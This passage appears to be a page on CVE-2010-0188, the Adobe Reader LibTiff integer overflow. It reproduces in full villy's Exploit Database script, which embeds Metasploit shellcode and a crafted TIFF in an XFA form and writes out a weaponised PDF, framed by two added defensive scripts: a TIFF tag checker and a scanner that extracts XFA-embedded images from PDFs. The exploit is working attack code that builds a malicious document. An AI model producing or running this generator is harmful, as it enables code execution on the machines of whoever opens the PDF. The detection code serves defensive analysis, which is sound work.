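        if e["tag"] == TAG_DOTRANGE and e["count"] > 2:
            findings.append(("oversized-dotrange", e))
    return findings


def build_tiff(entries, blobs=b""):
    """Constructed little-endian TIFF: 8-byte header, IFD0 right after it, then out-of-line data."""
    ifd_off = 8
    body = struct.pack("<H", len(entries))
    for tag, typ, count, value in entries:
        body += struct.pack("<HHII", tag, typ, count, value)
    body += struct.pack("<I", 0)  # no next IFD
    return b"II" + struct.pack("<HI", 42, ifd_off) + body + blobs


# Constructed samples. With three entries the out-of-line data starts at 8 + 2 + 3*12 + 4 = 50.
BENIGN_TIFF = build_tiff([(0x0100, 3, 1, 1), (0x0101, 3, 1, 1),
                          (0x0150, 3, 2, 0x00FF0000)])          # DotRange = [0, 255], inline
EXPLOIT_SHAPED_TIFF = build_tiff([(0x0100, 3, 1, 1), (0x0101, 3, 1, 1),
                                  (0x0150, 3, 0xCC, 50)], b"\x00" * (0xCC * 2))
TRUNCATED_TIFF = build_tiff([(0x0100, 3, 1, 1), (0x0101, 3, 1, 1),
                             (0x0150, 3, 0xCC, 50)], b"\x00" * 16)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_TIFF), ("exploit-shaped", EXPLOIT_SHAPED_TIFF),
                          ("truncated", TRUNCATED_TIFF)):
        for kind, entry in find_suspicious_entries(sample):
            print(label, kind, entry["name"], "count", entry["count"])
```

The check is deliberately structural: it never decodes pixel data, so it is safe to run on untrusted input, and the per-tag count limit is the same rule a patched libtiff applies when it refuses more values than the tag's definition allows.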
Exploit Database EDB-ID : 11787
Publication date : 2010-03-16 23h00 +00:00
Author : villy
EDB Verified : Yes
# Python 2 script (print statements, str used as bytes).
__doc__='''
Title: Adobe PDF LibTiff Integer Overflow Code Execution.
Product: Adobe Acrobat Reader
Version: <=8.3.0, <=9.3.0
CVE: 2010-0188
Author: villy (villys777 at gmail.com)
Site: http://bugix-security.blogspot.com/
Tested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3)
------------------------------------------------------------------------
'''
import sys
import base64
import struct
import zlib
import StringIO

SHELLCODE_OFFSET=0x555
TIFF_OFSET=0x2038

# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
buf = "\x2b\xc9\xd9\xc0\xd9\x74\x24\xf4\x5e\xb1\x33\xba\xd9\xb4"
buf += "\x0a\xbe\x31\x56\x15\x03\x56\x15\x83\x1f\xb0\xe8\x4b\x63"
buf += "\x51\x65\xb3\x9b\xa2\x16\x3d\x7e\x93\x04\x59\x0b\x86\x98"
buf += "\x29\x59\x2b\x52\x7f\x49\xb8\x16\xa8\x7e\x09\x9c\x8e\xb1"
buf += "\x8a\x10\x0f\x1d\x48\x32\xf3\x5f\x9d\x94\xca\x90\xd0\xd5"
buf += "\x0b\xcc\x1b\x87\xc4\x9b\x8e\x38\x60\xd9\x12\x38\xa6\x56"
buf += "\x2a\x42\xc3\xa8\xdf\xf8\xca\xf8\x70\x76\x84\xe0\xfb\xd0"
buf += "\x35\x11\x2f\x03\x09\x58\x44\xf0\xf9\x5b\x8c\xc8\x02\x6a"
buf += "\xf0\x87\x3c\x43\xfd\xd6\x79\x63\x1e\xad\x71\x90\xa3\xb6"
buf += "\x41\xeb\x7f\x32\x54\x4b\x0b\xe4\xbc\x6a\xd8\x73\x36\x60"
buf += "\x95\xf0\x10\x64\x28\xd4\x2a\x90\xa1\xdb\xfc\x11\xf1\xff"
buf += "\xd8\x7a\xa1\x9e\x79\x26\x04\x9e\x9a\x8e\xf9\x3a\xd0\x3c"
buf += "\xed\x3d\xbb\x2a\xf0\xcc\xc1\x13\xf2\xce\xc9\x33\x9b\xff"
buf += "\x42\xdc\xdc\xff\x80\x99\x13\x4a\x88\x8b\xbb\x13\x58\x8e"
buf += "\xa1\xa3\xb6\xcc\xdf\x27\x33\xac\x1b\x37\x36\xa9\x60\xff"
buf += "\xaa\xc3\xf9\x6a\xcd\x70\xf9\xbe\xae\x17\x69\x22\x1f\xb2"
buf += "\x09\xc1\x5f\x00"


class CVE20100188Exploit:
    def __init__(self,shellcode):
        self.shellcode = shellcode
        self.tiff64=base64.b64encode(self.gen_tiff())

    def gen_tiff(self):
        # TIFF header: little-endian, magic 42, IFD placed at TIFF_OFSET
        tiff = '\x49\x49\x2a\x00'
        tiff += struct.pack("<L", TIFF_OFSET)
        # NOP sled, shellcode, then padding up to the IFD
        tiff += '\x90' * (SHELLCODE_OFFSET)
        tiff += self.shellcode
        tiff += '\x90' * (TIFF_OFSET - 8 - len(self.shellcode) - SHELLCODE_OFFSET)
        # IFD with 7 entries; the last one (tag 0x0150) has count 0xCC
        tiff += "\x07\x00\x00\x01\x03\x00\x01\x00"
        tiff += "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"
        tiff += "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"
        tiff += "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"
        tiff += "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"
        tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"
        tiff += "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00\xF7\x72\x00\x07\x04\x01"
        tiff += "\x01\x00\xBB\x15\x00\x07\x00\x10\x00\x00\x4D\x15\x00\x07\xBB\x15"
        tiff += "\x00\x07\x00\x03\xFE\x7F\xB2\x7F\x00\x07\xBB\x15\x00\x07\x11\x00"
        tiff += "\x01\x00\xAC\xA8\x00\x07\xBB\x15\x00\x07\x00\x01\x01\x00\xAC\xA8"
        tiff += "\x00\x07\xF7\x72\x00\x07\x11\x00\x01\x00\xE2\x52\x00\x07\x54\x5C"
        tiff += "\x00\x07\xFF\xFF\xFF\xFF\x00\x01\x01\x00\x00\x00\x00\x00\x04\x01"
        tiff += "\x01\x00\x00\x10\x00\x00\x40\x00\x00\x00\x31\xD7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x5A\x52\x6A\x02\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x58\xCD\x2E\x3C\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x05\x5A\x74\xF4\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xB8\x49\x49\x2A\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x00\x8B\xFA\xAF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x75\xEA\x87\xFE\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xEB\x0A\x5F\xB9\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xE0\x03\x00\x00\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xF3\xA5\xEB\x09\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xE8\xF1\xFF\xFF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xFF\x90\x90\x90\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xFF\xFF\xFF\x90\x4D\x15\x00\x07\x31\xD7\x00\x07\x2F\x11"
        tiff += "\x00\x07"
        return tiff

    def gen_xml(self):
        # XFA packet carrying the base64 TIFF as an image field value
        xml= '''<?xml version="1.0" encoding="UTF-8" ?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version>
<interactive>1</interactive>
<linearized>1</linearized>
</pdf>
<xdp>
<packets>*</packets>
</xdp>
<destination>pdf</destination>
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
<medium short="612pt" long="792pt" stock="custom" />
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" />
<bind match="none" />
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1>
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" />
<subform name="Page1">
<field name="ImageField1" />
</subform>
<pageSet>
<pageArea name="PageArea1" />
</pageSet>
</subform>
</form>
</xdp:xdp>
'''
        return xml

    def gen_pdf(self):
        # The XFA packet is Flate-compressed into object 1 and referenced from the AcroForm
        xml = zlib.compress(self.gen_xml())
        pdf='''%PDF-1.6
1 0 obj
<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
stream
''' + xml+'''
endstream
endobj
2 0 obj
<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
endobj
3 0 obj
<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
endobj
4 0 obj
<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
endobj
5 0 obj
<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
endobj
6 0 obj
<</Kids [5 0 R]/Type /Pages/Count 1>>
endobj
7 0 obj
<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
endobj
8 0 obj
<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
endobj xref
trailer
<</Root 7 0 R/Size 9>>
startxref
14765
%%EOF'''
        return pdf


if __name__=="__main__":
    print __doc__
    if len(sys.argv) != 2:
        print "Usage: %s [output.pdf]" % sys.argv[0]
        sys.exit(1)
    print "Creating Exploit to %s\n"% sys.argv[1]
    exploit=CVE20100188Exploit(buf)
    f = open(sys.argv[1],mode='wb')
    f.write(exploit.gen_pdf())
    f.close()
    print "[+] done !"
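Neither Adobe exploit above hands the TIFF to the reader as a plain attachment: both embed it base64-encoded inside an XFA datasets packet (`<ImageField1 xfa:contentType="image/tif">`) that is itself Flate-compressed into a PDF stream referenced from the AcroForm's `/XFA` array. The following added example, not part of villy's script or the Metasploit module, shows how a document scanner can inflate a PDF's streams, pull out XFA-embedded images and report whether they carry a TIFF signature, which is the point at which a TIFF structure check can be applied. The sample PDF is constructed inline with the same object layout but a harmless 14-byte TIFF header in place of the exploit image; the regexes and helper names are this example's own.

```python
"""Locate XFA-embedded images in a PDF, written as an added defensive example."""
import base64
import re
import zlib

# A stream object: dictionary, 'stream' keyword, body, 'endstream'. Real scanners should
# honour /Length rather than searching for the keyword, which binary bodies can mimic.
STREAM_RE = re.compile(rb"<<(.*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# An XFA data element whose content type declares a TIFF, with base64 text as its value.
IMAGE_RE = re.compile(
    rb'<(\w+)\s+[^>]*xfa:contentType="image/tiff?"[^>]*>([A-Za-z0-9+/=\s]*)</\1>')


def iter_streams(pdf):
    """Yield (stream dictionary, decoded body); FlateDecode streams are inflated."""
    for m in STREAM_RE.finditer(pdf):
        d, body = m.group(1), m.group(2)
        if b"/FlateDecode" in d:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue  # corrupt or differently-filtered stream: skip, do not crash
        yield d, body


def find_xfa_images(pdf):
    """Return [(field name, raw image bytes)] for TIFFs carried inside XFA data packets."""
    hits = []
    for _, body in iter_streams(pdf):
        if b"xfa:datasets" not in body and b"xdp:xdp" not in body:
            continue
        for m in IMAGE_RE.finditer(body):
            try:
                raw = base64.b64decode(re.sub(rb"\s", b"", m.group(2)))
            except ValueError:  # binascii.Error is a ValueError
                continue
            hits.append((m.group(1).decode("ascii"), raw))
    return hits


def assess(pdf):
    """Summarise each embedded image: field name, size, and whether it has a TIFF signature."""
    report = []
    for name, raw in find_xfa_images(pdf):
        is_tiff = raw[:4] in (b"II*\x00", b"MM\x00*")
        report.append({"field": name, "bytes": len(raw), "tiff_magic": is_tiff})
    return report


def build_sample_pdf(image_bytes):
    """Constructed minimal PDF with the exploit's XFA layout (object 1 only; no form objects)."""
    xml = (b'<?xml version="1.0" encoding="UTF-8" ?>\n'
           b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">\n'
           b'<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">\n'
           b'<xfa:data><topmostSubform>\n'
           b'<ImageField1 xfa:contentType="image/tif" href="">'
           + base64.b64encode(image_bytes) +
           b'</ImageField1>\n</topmostSubform></xfa:data></xfa:datasets></xdp:xdp>\n')
    stream = zlib.compress(xml)
    return (b"%PDF-1.6\n1 0 obj\n<</Filter /FlateDecode/Length "
            + str(len(stream)).encode("ascii") + b"/Type /EmbeddedFile>>\nstream\n"
            + stream + b"\nendstream\nendobj\n%%EOF")


# Constructed sample: a TIFF header pointing at an empty IFD, 14 bytes, nothing else.
HARMLESS_TIFF = b"II*\x00" + b"\x08\x00\x00\x00" + b"\x00\x00" + b"\x00\x00\x00\x00"
SAMPLE_PDF = build_sample_pdf(HARMLESS_TIFF)

if __name__ == "__main__":
    for entry in assess(SAMPLE_PDF):
        print(entry)
```

Running `assess` over the sample reports one `ImageField1` hit of 14 bytes with `tiff_magic` true; in a triage pipeline that is the point to hand the raw bytes to a TIFF IFD check or to quarantine documents that hide image data in form datasets at all, which is unusual for benign forms.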
Products Mentioned
Configuration 0
Adobe>>Acrobat >> Version From (including) 8.0 To (excluding) 8.2.1
Adobe>>Acrobat >> Version From (including) 9.0 To (excluding) 9.3.1
Adobe>>Acrobat_reader >> Version From (including) 8.0 To (excluding) 8.2.1
Adobe>>Acrobat_reader >> Version From (including) 9.0 To (excluding) 9.3.1
References